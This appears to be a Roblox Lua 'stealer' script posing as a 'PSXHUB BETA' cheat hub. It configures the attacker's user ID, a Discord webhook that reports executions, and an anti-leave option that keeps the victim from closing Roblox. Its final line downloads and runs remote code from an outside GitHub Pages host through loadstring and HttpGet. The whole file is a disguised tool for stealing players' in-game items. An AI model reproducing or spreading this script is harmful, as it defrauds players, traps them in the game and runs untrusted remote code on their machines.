--[[ Arkhalis Bank Stealer]]--


--[[ Main Config ]]--
_G.UserId = 3047655833 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example

_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Diamonds = 100000 --// Amount Of Diamonds To Not Kick

--[[ Webhook Config ]]--
_G.Webhook = "" --// Discord link Webhook For Executions
    
--[[ UI Config ]]--
_G.ScriptName = "PSXHUB BETA 0.5" --// Script Name On The UI
_G.Tip1 = "Dm On Discord For Support" --// Gives You Tips On The UI
_G.Tip2 = "Expect Gliches,This Is Still A Beta" --// Gives You Tips On The UI
_G.Tip3 = "Don't Leave The Game" --// Gives You Tips On The UI
_G.Tip4 = "Coems 🤑" --// Gives You Tips On The UI
_G.Tip5 = "Habibi?" --// Gives You Tips On The UI


--[[ Script ]]--
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisBank.lua"))()
